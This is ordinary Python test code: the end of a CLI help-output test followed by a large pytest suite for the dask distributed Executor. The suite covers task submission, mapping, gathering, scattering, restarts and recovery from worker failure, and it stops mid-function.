length Default to 300 seconds -connection_timeout CONNECTION_TIMEOUT Specify connection timeout Mailing: -no_mail disable final email report -no_notify disable notification on device health status other than "ok" -mailto list of email recipients -mail_subject report email subject header -notify_subject notification email subject header -email_domain default email domain -smtp_host specify smtp host -smtp_port specify smtp server port -smtp_username specify smtp username -smtp_password specify smtp password ''' self.maxDiff = None self.assertEqual(help_output.strip() , expected.strip()) if __name__ == '__main__': unittest.main()
test_executor.py
from __future__ import division from operator import add, sub from collections import Iterator from concurrent.futures import CancelledError from datetime import timedelta import itertools from multiprocessing import Process import os import shutil import sys from threading import Thread from time import sleep, time import traceback import pytest from toolz import identity, isdistinct, first, concat, pluck from tornado.ioloop import IOLoop from tornado.iostream import IOStream from tornado import gen from dask.context import _globals from dask.compatibility import apply from distributed import Center, Worker, Nanny from distributed.core import rpc, dumps, loads from distributed.client import WrappedKey from distributed.executor import (Executor, Future, CompatibleExecutor, _wait, wait, _as_completed, as_completed, tokenize, _global_executor, default_executor, _first_completed, ensure_default_get, futures_of) from distributed.scheduler import Scheduler from distributed.sizeof import sizeof from distributed.utils import ignoring, sync, tmp_text from distributed.utils_test import (cluster, cluster_center, slow, _test_cluster, _test_scheduler, loop, inc, dec, div, throws, gen_cluster, gen_test, double, deep) @gen_cluster() def test_submit(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 10) assert not x.done() assert isinstance(x, Future) assert x.executor is e result = yield x._result() assert result == 11 assert x.done() y = e.submit(inc, 20) z = e.submit(add, x, y) result = yield z._result() assert result == 11 + 21 yield e._shutdown() @gen_cluster() def test_map(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() L1 = e.map(inc, range(5)) assert len(L1) == 5 assert isdistinct(x.key for x in L1) assert all(isinstance(x, Future) for x in L1) result = yield L1[0]._result() assert result == inc(0) assert len(s.tasks) == 5 L2 = e.map(inc, L1) result = yield L2[1]._result() assert result == inc(inc(1)) assert len(s.tasks) == 10 # assert L1[0].key in s.tasks[L2[0].key] total = e.submit(sum, L2) result = yield total._result() assert result == sum(map(inc, map(inc, range(5)))) L3 = e.map(add, L1, L2) result = yield L3[1]._result() assert result == inc(1) + inc(inc(1)) L4 = e.map(add, range(3), range(4)) results = yield e._gather(L4) if sys.version_info[0] >= 3: assert results == list(map(add, range(3), range(4))) def f(x, y=10): return x + y L5 = e.map(f, range(5), y=5) results = yield e._gather(L5) assert results == list(range(5, 10)) y = e.submit(f, 10) L6 = e.map(f, range(5), y=y) results = yield e._gather(L6) assert results == list(range(20, 25)) yield e._shutdown() @gen_cluster() def test_compatible_map(s, a, b): e = CompatibleExecutor((s.ip, s.port), start=False) yield e._start() results = e.map(inc, range(5)) assert not isinstance(results, list) # Since this map blocks as it waits for results, # waiting here will block the current IOLoop, # which happens to also be running the test Workers. # So wait on the results in a background thread to avoid blocking. 
f = gen.Future() def wait_on_results(): f.set_result(list(results)) t = Thread(target=wait_on_results) t.daemon = True t.start() result_list = yield f # getting map results blocks assert result_list == list(map(inc, range(5))) yield e._shutdown() @gen_cluster() def test_future(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 10) assert str(x.key) in repr(x) assert str(x.status) in repr(x) yield e._shutdown() @gen_cluster() def test_Future_exception(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(div, 1, 0) result = yield x._exception() assert isinstance(result, ZeroDivisionError) x = e.submit(div, 1, 1) result = yield x._exception() assert result is None yield e._shutdown() def test_Future_exception_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(div, 1, 0) assert isinstance(x.exception(), ZeroDivisionError) x = e.submit(div, 1, 1) assert x.exception() is None @gen_cluster() def test_map_naming(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() L1 = e.map(inc, range(5)) L2 = e.map(inc, range(5)) assert [x.key for x in L1] == [x.key for x in L2] L3 = e.map(inc, [1, 1, 1, 1]) assert len({x.event for x in L3}) == 1 L4 = e.map(inc, [1, 1, 1, 1], pure=False) assert len({x.event for x in L4}) == 4 yield e._shutdown() @gen_cluster() def test_submit_naming(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() a = e.submit(inc, 1) b = e.submit(inc, 1) assert a.event is b.event c = e.submit(inc, 1, pure=False) assert c.key != a.key yield e._shutdown() @gen_cluster() def test_exceptions(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(div, 1, 2) result = yield x._result() assert result == 1 / 2 x = e.submit(div, 1, 0) with pytest.raises(ZeroDivisionError): result = yield x._result() x = e.submit(div, 10, 2) # continues to operate result = yield x._result() assert result == 10 / 2 yield e._shutdown() @gen_cluster() def test_gc(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 10) result = yield x._result() assert s.who_has[x.key] x.__del__() yield e._shutdown() assert not s.who_has[x.key] def test_thread(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(inc, 1) assert x.result() == 2 def test_sync_exceptions(loop): with cluster() as (s, [a, b]): e = Executor(('127.0.0.1', s['port']), loop=loop) x = e.submit(div, 10, 2) assert x.result() == 5 y = e.submit(div, 10, 0) try: y.result() assert False except ZeroDivisionError: pass z = e.submit(div, 10, 5) assert z.result() == 2 e.shutdown() @gen_cluster() def test_stress_1(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() n = 2**6 seq = e.map(inc, range(n)) while len(seq) > 1: yield gen.sleep(0.1) seq = [e.submit(add, seq[i], seq[i + 1]) for i in range(0, len(seq), 2)] result = yield seq[0]._result() assert result == sum(map(inc, range(n))) yield e._shutdown() @gen_cluster() def test_gather(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 10) y = e.submit(inc, x) result = yield e._gather(x) assert result == 11 result = yield e._gather([x]) assert result == [11] result = yield e._gather({'x': x, 'y': [y]}) assert result == {'x': 11, 'y': [12]} yield e._shutdown() def test_gather_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(inc, 1) assert 
e.gather(x) == 2 y = e.submit(div, 1, 0) with pytest.raises(ZeroDivisionError): e.gather([x, y]) [xx] = e.gather([x, y], errors='skip') assert xx == 2 @gen_cluster() def test_gather_strict(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(div, 2, 1) y = e.submit(div, 1, 0) with pytest.raises(ZeroDivisionError): result = yield e._gather([x, y]) [xx] = yield e._gather([x, y], errors='skip') assert xx == 2 yield e._shutdown() @gen_cluster() def test_get(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() result = yield e._get({'x': (inc, 1)}, 'x') assert result == 2 result = yield e._get({'x': (inc, 1)}, ['x']) assert result == [2] result = yield e._get({}, []) assert result == [] yield e._shutdown() def test_get_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: assert e.get({'x': (inc, 1)}, 'x') == 2 def test_submit_errors(loop): def f(a, b, c): pass e = Executor('127.0.0.1:8787', start=False, loop=loop) with pytest.raises(TypeError): e.submit(1, 2, 3) with pytest.raises(TypeError): e.map([1, 2, 3]) @gen_cluster() def test_wait(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() a = e.submit(inc, 1) b = e.submit(inc, 1) c = e.submit(inc, 2) done, not_done = yield _wait([a, b, c]) assert done == {a, b, c} assert not_done == set() assert a.status == b.status == 'finished' yield e._shutdown() @gen_cluster() def test__as_completed(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() a = e.submit(inc, 1) b = e.submit(inc, 1) c = e.submit(inc, 2) from distributed.compatibility import Queue queue = Queue() yield _as_completed([a, b, c], queue) assert queue.qsize() == 3 assert {queue.get(), queue.get(), queue.get()} == {a, b, c} result = yield _first_completed([a, b, c]) assert result in [a, b, c] yield e._shutdown() def test_as_completed(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(inc, 1) y = e.submit(inc, 2) z = e.submit(inc, 1) seq = as_completed([x, y, z]) assert isinstance(seq, Iterator) assert set(seq) == {x, y, z} def test_wait_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(inc, 1) y = e.submit(inc, 2) done, not_done = wait([x, y]) assert done == {x, y} assert not_done == set() assert x.status == y.status == 'finished' @gen_cluster() def test_garbage_collection(s, a, b): import gc e = Executor((s.ip, s.port), start=False) yield e._start() a = e.submit(inc, 1) b = e.submit(inc, 1) assert e.refcount[a.key] == 2 a.__del__() assert e.refcount[a.key] == 1 c = e.submit(inc, b) b.__del__() result = yield c._result() assert result == 3 bkey = b.key b.__del__() assert bkey not in e.futures yield e._shutdown() @gen_cluster() def test_garbage_collection_with_scatter(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() [a] = yield e._scatter([1]) assert a.key in e.futures assert a.status == 'finished' assert a.event.is_set() assert s.who_wants[a.key] == {e.id} assert e.refcount[a.key] == 1 a.__del__() assert e.refcount[a.key] == 0 start = time() while True: if a.key not in s.who_has: break else: assert time() < start + 3 yield gen.sleep(0.1) yield e._shutdown() @gen_cluster(timeout=1000) def test_recompute_released_key(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 100) result1 = yield x._result() xkey = x.key del x import gc; gc.collect() assert e.refcount[xkey] == 0 # 1 second batching 
needs a second action to trigger while xkey in s.who_has or xkey in a.data or xkey in b.data: yield gen.sleep(0.1) x = e.submit(inc, 100) assert x.key in e.futures result2 = yield x._result() assert result1 == result2 yield e._shutdown() def slowinc(x): from time import sleep sleep(0.02) return x + 1 @pytest.mark.parametrize(('func', 'n'), [(slowinc, 100), (inc, 1000)]) def test_stress_gc(loop, func, n): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(func, 1) for i in range(n): x = e.submit(func, x) assert x.result() == n + 2 @slow def test_long_tasks_dont_trigger_timeout(loop): @gen.coroutine def f(c, a, b): e = Executor((c.ip, c.port), start=False, loop=loop) yield e._start() from time import sleep x = e.submit(sleep, 3) yield x._result() yield e._shutdown() _test_cluster(f, loop) @gen_cluster() def test_missing_data_heals(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) y = e.submit(inc, x) z = e.submit(inc, y) yield _wait([x, y, z]) # Secretly delete y's key if y.key in a.data: del a.data[y.key] if y.key in b.data: del b.data[y.key] w = e.submit(add, y, z) result = yield w._result() assert result == 3 + 4 yield e._shutdown() @slow @gen_cluster() def test_missing_worker(s, a, b): bad = ('bad-host', 8788) s.ncores[bad] = 4 s.who_has['b'] = {bad} s.has_what[bad] = {'b'} e = Executor((s.ip, s.port), start=False) yield e._start() dsk = {'a': 1, 'b': (inc, 'a'), 'c': (inc, 'b')} result = yield e._get(dsk, 'c') assert result == 3 assert bad not in s.ncores yield e._shutdown() @gen_cluster() def test_gather_robust_to_missing_data(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x, y, z = e.map(inc, range(3)) yield _wait([x, y, z]) # everything computed for q in [x, y]: if q.key in a.data: del a.data[q.key] if q.key in b.data: del b.data[q.key] xx, yy, zz = yield e._gather([x, y, z]) assert (xx, yy, zz) == (1, 2, 3) yield e._shutdown() @gen_cluster() def test_gather_robust_to_nested_missing_data(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() w = e.submit(inc, 1) x = e.submit(inc, w) y = e.submit(inc, x) z = e.submit(inc, y) yield _wait([z]) for worker in [a, b]: for datum in [y, z]: if datum.key in worker.data: del worker.data[datum.key] result = yield e._gather([z]) assert result == [inc(inc(inc(inc(1))))] yield e._shutdown() @gen_cluster() def test_tokenize_on_futures(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) y = e.submit(inc, 1) tok = tokenize(x) assert tokenize(x) == tokenize(x) assert tokenize(x) == tokenize(y) e.futures[x.key]['status'] = 'finished' assert tok == tokenize(y) yield e._shutdown() @pytest.mark.skipif(sys.platform!='linux', reason="Need 127.0.0.2 to mean localhost") @gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)]) def test_restrictions_submit(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1, workers={a.ip}) y = e.submit(inc, x, workers={b.ip}) yield _wait([x, y]) assert s.restrictions[x.key] == {a.ip} assert x.key in a.data assert s.restrictions[y.key] == {b.ip} assert y.key in b.data yield e._shutdown() @pytest.mark.skipif(sys.platform!='linux', reason="Need 127.0.0.2 to mean localhost") @gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)]) def test_restrictions_map(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() L = e.map(inc, range(5), workers={a.ip}) yield _wait(L) assert set(a.data) == {x.key for x in L} assert not b.data for x in 
L: assert s.restrictions[x.key] == {a.ip} L = e.map(inc, [10, 11, 12], workers=[{a.ip}, {a.ip, b.ip}, {b.ip}]) yield _wait(L) assert s.restrictions[L[0].key] == {a.ip} assert s.restrictions[L[1].key] == {a.ip, b.ip} assert s.restrictions[L[2].key] == {b.ip} with pytest.raises(ValueError): e.map(inc, [10, 11, 12], workers=[{a.ip}]) yield e._shutdown() @pytest.mark.skipif(sys.platform!='linux', reason="Need 127.0.0.2 to mean localhost") @gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)]) def test_restrictions_get(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() dsk = {'x': 1, 'y': (inc, 'x'), 'z': (inc, 'y')} restrictions = {'y': {a.ip}, 'z': {b.ip}} result = yield e._get(dsk, ['y', 'z'], restrictions) assert result == [2, 3] assert 'y' in a.data assert 'z' in b.data yield e._shutdown() @gen_cluster() def dont_test_bad_restrictions_raise_exception(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() z = e.submit(inc, 2, workers={'bad-address'}) try: yield z._result() assert False except ValueError as e: assert 'bad-address' in str(e) assert z.key in str(e) yield e._shutdown() def test_submit_after_failed_worker(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: L = e.map(inc, range(10)) wait(L) a['proc'].terminate() total = e.submit(sum, L) assert total.result() == sum(map(inc, range(10))) def test_gather_after_failed_worker(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: L = e.map(inc, range(10)) wait(L) a['proc'].terminate() result = e.gather(L) assert result == list(map(inc, range(10))) @slow def test_gather_then_submit_after_failed_workers(loop): with cluster(nworkers=4) as (s, [w, x, y, z]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: L = e.map(inc, range(20)) wait(L) w['proc'].terminate() total = e.submit(sum, L) wait([total]) (_, port) = first(e.scheduler.who_has[total.key]) for d in [x, y, z]: if d['port'] == port: d['proc'].terminate() result = e.gather([total]) assert result == [sum(map(inc, range(20)))] @gen_test() def test_errors_dont_block(): c = Center('127.0.0.1') c.listen(0) w = Worker(c.ip, c.port, ncores=1, ip='127.0.0.1') e = Executor((c.ip, c.port), start=False, loop=IOLoop.current()) yield w._start() yield e._start() L = [e.submit(inc, 1), e.submit(throws, 1), e.submit(inc, 2), e.submit(throws, 2)] start = time() while not (L[0].status == L[2].status == 'finished'): assert time() < start + 5 yield gen.sleep(0.01) result = yield e._gather([L[0], L[2]]) assert result == [2, 3] yield w._close() c.stop() @gen_cluster() def test_submit_quotes(s, a, b): def assert_list(x, z=[]): return isinstance(x, list) and isinstance(z, list) e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(assert_list, [1, 2, 3]) result = yield x._result() assert result x = e.submit(assert_list, [1, 2, 3], z=[4, 5, 6]) result = yield x._result() assert result x = e.submit(inc, 1) y = e.submit(inc, 2) z = e.submit(assert_list, [x, y]) result = yield z._result() assert result yield e._shutdown() @gen_cluster() def test_map_quotes(s, a, b): def assert_list(x, z=[]): return isinstance(x, list) and isinstance(z, list) e = Executor((s.ip, s.port), start=False) yield e._start() L = e.map(assert_list, [[1, 2, 3], [4]]) result = yield e._gather(L) assert all(result) L = e.map(assert_list, [[1, 2, 3], [4]], z=[10]) result = yield e._gather(L) assert all(result) L = e.map(assert_list, [[1, 2, 3], [4]], [[]] * 3) result = yield e._gather(L) assert all(result) 
yield e._shutdown() @gen_cluster() def test_two_consecutive_executors_share_results(s, a, b): from random import randint e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(randint, 0, 1000, pure=True) xx = yield x._result() f = Executor((s.ip, s.port), start=False) yield f._start() y = f.submit(randint, 0, 1000, pure=True) yy = yield y._result() assert xx == yy yield e._shutdown() yield f._shutdown() @gen_cluster() def test_submit_then_get_with_Future(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(slowinc, 1) dsk = {'y': (inc, x)} result = yield e._get(dsk, 'y') assert result == 3 yield e._shutdown() @gen_cluster() def test_aliases(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) dsk = {'y': x} result = yield e._get(dsk, 'y') assert result == 2 yield e._shutdown() @gen_cluster() def test__scatter(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() d = yield e._scatter({'y': 20}) assert isinstance(d['y'], Future) assert a.data.get('y') == 20 or b.data.get('y') == 20 assert (a.address in s.who_has['y'] or b.address in s.who_has['y']) assert s.who_has['y'] assert s.nbytes == {'y': sizeof(20)} yy = yield e._gather([d['y']]) assert yy == [20] [x] = yield e._scatter([10]) assert isinstance(x, Future) assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10 xx = yield e._gather([x]) assert s.who_has[x.key] assert (a.address in s.who_has[x.key] or b.address in s.who_has[x.key]) assert s.nbytes == {'y': sizeof(20), x.key: sizeof(10)} assert xx == [10] z = e.submit(add, x, d['y']) # submit works on Future result = yield z._result() assert result == 10 + 20 result = yield e._gather([z, x]) assert result == [30, 10] yield e._shutdown() @gen_cluster() def test_scatter_hash(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() [a] = yield e._scatter([1]) [b] = yield e._scatter([1]) assert a.key == b.key yield e._shutdown() @gen_cluster() def test_get_releases_data(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() [x] = yield e._get({'x': (inc, 1)}, ['x']) import gc; gc.collect() assert e.refcount['x'] == 0 yield e._shutdown() def test_global_executors(loop): assert not _global_executor[0] with pytest.raises(ValueError): default_executor() with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: assert _global_executor == [e] assert default_executor() is e with Executor(('127.0.0.1', s['port']), loop=loop) as f: assert _global_executor == [f] assert default_executor() is f assert default_executor(e) is e assert default_executor(f) is f assert not _global_executor[0] @gen_cluster() def test_exception_on_exception(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(lambda: 1 / 0) y = e.submit(inc, x) with pytest.raises(ZeroDivisionError): out = yield y._result() z = e.submit(inc, y) with pytest.raises(ZeroDivisionError): out = yield z._result() yield e._shutdown() @gen_cluster() def test_nbytes(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() [x] = yield e._scatter([1]) assert s.nbytes == {x.key: sizeof(1)} y = e.submit(inc, x) yield y._result() assert s.nbytes == {x.key: sizeof(1), y.key: sizeof(2)} yield e._shutdown() @pytest.mark.skipif(sys.platform!='linux', reason="Need 127.0.0.2 to mean localhost") @gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)]) def test_nbytes_determines_worker(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(identity, 1, 
workers=[a.address[0]]) y = e.submit(identity, tuple(range(100)), workers=[b.address[0]]) yield e._gather([x, y]) z = e.submit(lambda x, y: None, x, y) yield z._result() assert s.who_has[z.key] == {b.address} yield e._shutdown() @gen_cluster() def test_pragmatic_move_small_data_to_large_data(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() lists = e.map(lambda n: list(range(n)), [10] * 10, pure=False) sums = e.map(sum, lists) total = e.submit(sum, sums) def f(x, y): return None results = e.map(f, lists, [total] * 10) yield _wait([total]) yield _wait(results) for l, r in zip(lists, results): assert s.who_has[l.key] == s.who_has[r.key] yield e._shutdown() @gen_cluster() def test_get_with_non_list_key(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() dsk = {('x', 0): (inc, 1), 5: (inc, 2)} x = yield e._get(dsk, ('x', 0)) y = yield e._get(dsk, 5) assert x == 2 assert y == 3 yield e._shutdown() @gen_cluster() def test_get_with_error(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() dsk = {'x': (div, 1, 0), 'y': (inc, 'x')} with pytest.raises(ZeroDivisionError): y = yield e._get(dsk, 'y') yield e._shutdown() def test_get_with_error_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: dsk = {'x': (div, 1, 0), 'y': (inc, 'x')} with pytest.raises(ZeroDivisionError): y = e.get(dsk, 'y') @gen_cluster() def test_directed_scatter(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() yield e._scatter([1, 2, 3], workers=[a.address]) assert len(a.data) == 3 assert not b.data yield e._shutdown() def test_directed_scatter_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: futures = e.scatter([1, 2, 3], workers=[('127.0.0.1', b['port'])]) has_what = sync(loop, e.scheduler.has_what) assert len(has_what[('127.0.0.1', b['port'])]) == 3 assert len(has_what[('127.0.0.1', a['port'])]) == 0 def test_iterator_scatter(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as ee: aa = ee.scatter([1,2,3]) assert [1,2,3] == ee.gather(aa) g = (i for i in range(10)) futures = ee.scatter(g) assert isinstance(futures, Iterator) a = next(futures) assert ee.gather(a) == 0 def test_queue_scatter(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as ee: from distributed.compatibility import Queue q = Queue() for d in range(10): q.put(d) futures = ee.scatter(q) assert isinstance(futures, Queue) a = futures.get() assert ee.gather(a) == 0 def test_queue_gather(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as ee: from distributed.compatibility import Queue q = Queue() qin = list(range(10)) for d in qin: q.put(d) futures = ee.scatter(q) assert isinstance(futures, Queue) ff = ee.gather(futures) assert isinstance(ff, Queue) qout = [] for f in range(10): qout.append(ff.get()) assert qout == qin def test_iterator_gather(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as ee: i_in = list(range(10)) g = (d for d in i_in) futures = ee.scatter(g) assert isinstance(futures, Iterator) ff = ee.gather(futures) assert isinstance(ff, Iterator) i_out = list(ff) assert i_out == i_in i_in = ['a', 'b', 'c', StopIteration, 'd', 'e'] g = (d for d in i_in) futures = ee.scatter(g) ff = ee.gather(futures) i_out = list(ff) assert i_out == i_in @gen_cluster() def test_many_submits_spread_evenly(s, a, b): e = Executor((s.ip, s.port), 
start=False) yield e._start() L = [e.submit(inc, i) for i in range(10)] yield _wait(L) assert a.data and b.data yield e._shutdown() @gen_cluster() def test_traceback(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(div, 1, 0) tb = yield x._traceback() if sys.version_info[0] >= 3: assert any('x / y' in line for line in pluck(3, traceback.extract_tb(tb))) yield e._shutdown() def test_traceback_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(div, 1, 0) tb = x.traceback() if sys.version_info[0] >= 3: assert any('x / y' in line for line in concat(traceback.extract_tb(tb)) if isinstance(line, str)) y = e.submit(inc, x) tb2 = y.traceback() assert set(pluck(3, traceback.extract_tb(tb2))).issuperset( set(pluck(3, traceback.extract_tb(tb)))) z = e.submit(div, 1, 2) tb = z.traceback() assert tb is None @gen_test() def test_restart(): from distributed import Nanny, rpc c = Center('127.0.0.1') c.listen(0) a = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') b = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') yield [a._start(), b._start()] e = Executor((c.ip, c.port), start=False, loop=IOLoop.current()) yield e._start() assert e.scheduler.ncores == {a.worker_address: 2, b.worker_address: 2} x = e.submit(inc, 1) y = e.submit(inc, x) yield y._result() cc = rpc(ip=c.ip, port=c.port) who_has = yield cc.who_has() try: assert e.scheduler.who_has == who_has assert set(e.scheduler.who_has) == {x.key, y.key} f = yield e._restart() assert f is e assert len(e.scheduler.stacks) == 2 assert len(e.scheduler.processing) == 2 who_has = yield cc.who_has() assert not who_has assert not e.scheduler.who_has assert x.cancelled() assert y.cancelled() finally: yield a._close() yield b._close() yield e._shutdown(fast=True) c.stop() def test_restart_sync_no_center(loop): with cluster(nanny=True) as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(inc, 1) e.restart() assert x.cancelled() y = e.submit(inc, 2) assert y.result() == 3 def test_restart_sync(loop): with cluster_center(nanny=True) as (c, [a, b]): with Executor(('127.0.0.1', c['port']), loop=loop) as e: assert len(e.scheduler.has_what) == 2 x = e.submit(div, 1, 2) x.result() assert e.scheduler.who_has e.restart() assert not e.scheduler.who_has assert x.cancelled() with pytest.raises(CancelledError): x.result() assert (set(e.scheduler.stacks) == set(e.scheduler.processing) == set(e.scheduler.ncores)) assert len(e.scheduler.stacks) == 2 y = e.submit(div, 1, 3) assert y.result() == 1 / 3 def test_restart_fast(loop): with cluster_center(nanny=True) as (c, [a, b]): with Executor(('127.0.0.1', c['port'])) as e: L = e.map(sleep, range(10)) start = time() e.restart() assert not e.scheduler.tasks assert time() - start < 5 assert all(x.status == 'cancelled' for x in L) x = e.submit(inc, 1) assert x.result() == 2 def test_fast_kill(loop): from distributed import Nanny, rpc c = Center('127.0.0.1') c.listen(0) a = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') b = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') e = Executor((c.ip, c.port), start=False, loop=loop) @gen.coroutine def f(): yield a._start() yield b._start() while len(c.ncores) < 2: yield gen.sleep(0.01) yield e._start() L = e.map(sleep, range(10)) try: start = time() yield e._restart() assert time() - start < 5 assert all(x.status == 'cancelled' for x in L) x = e.submit(inc, 1) result = yield x._result() assert result == 2 finally: yield a._close() yield b._close() yield e._shutdown(fast=True) 
c.stop() loop.run_sync(f) @gen_cluster() def test_upload_file(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() def g(): import myfile return myfile.f() with tmp_text('myfile.py', 'def f():\n return 123') as fn: yield e._upload_file(fn) sleep(1) # TODO: why is this necessary? x = e.submit(g, pure=False) result = yield x._result() assert result == 123 with tmp_text('myfile.py', 'def f():\n return 456') as fn: yield e._upload_file(fn) y = e.submit(g, pure=False) result = yield y._result() assert result == 456 yield e._shutdown() def test_upload_file_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port'])) as e: def g(): import myfile return myfile.x with tmp_text('myfile.py', 'x = 123') as fn: e.upload_file(fn) x = e.submit(g) assert x.result() == 123 @gen_cluster() def test_upload_file_exception(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() with tmp_text('myfile.py', 'syntax-error!') as fn: with pytest.raises(SyntaxError): yield e._upload_file(fn) yield e._shutdown() def test_upload_file_exception_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port'])) as e: with tmp_text('myfile.py', 'syntax-error!') as fn: with pytest.raises(SyntaxError): e.upload_file(fn) @gen_cluster() def test_multiple_executors(s, a, b): a = Executor((s.ip, s.port), start=False) yield a._start() b = Executor((s.ip, s.port), start=False) yield b._start() x = a.submit(inc, 1) y = b.submit(inc, 2) assert x.executor is a assert y.executor is b xx = yield x._result() yy = yield y._result() assert xx == 2 assert yy == 3 z = a.submit(add, x, y) assert z.executor is a zz = yield z._result() assert zz == 5 yield a._shutdown() yield b._shutdown() def test_multiple_executors_restart(loop): from distributed import Nanny, rpc c = Center('127.0.0.1') c.listen(0) a = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') b = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') @gen.coroutine def f(): yield a._start() yield b._start() while len(c.ncores) < 2: yield gen.sleep(0.01) try: e1 = Executor((c.ip, c.port), start=False, loop=loop) yield e1._start() e2 = Executor(e1.scheduler, start=False, loop=loop) yield e2._start() x = e1.submit(inc, 1) y = e2.submit(inc, 2) xx = yield x._result() yy = yield y._result() assert xx == 2 assert yy == 3 yield e1._restart() assert x.cancelled() assert y.cancelled() finally: yield a._close() yield b._close() yield e1._shutdown(fast=True) yield e2._shutdown(fast=True) c.stop() loop.run_sync(f) @gen_cluster() def test_async_compute(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() from dask.imperative import do, value x = value(1) y = do(inc)(x) z = do(dec)(x) [yy, zz, aa] = e.compute([y, z, 3], sync=False) assert isinstance(yy, Future) assert isinstance(zz, Future) assert aa == 3 result = yield e._gather([yy, zz]) assert result == [2, 0] assert isinstance(e.compute(y), Future) assert isinstance(e.compute([y]), (tuple, list)) yield e._shutdown() def test_sync_compute(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port'])) as e: from dask.imperative import do, value x = value(1) y = do(inc)(x) z = do(dec)(x) yy, zz = e.compute([y, z], sync=True) assert (yy, zz) == (2, 0) @gen_cluster() def test_remote_scheduler(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() assert isinstance(e.scheduler_stream, IOStream) assert s.streams x = e.submit(inc, 1) result = yield x._result() yield e._shutdown() def test_input_types(loop): @gen.coroutine def f(c, a, b): e1 = 
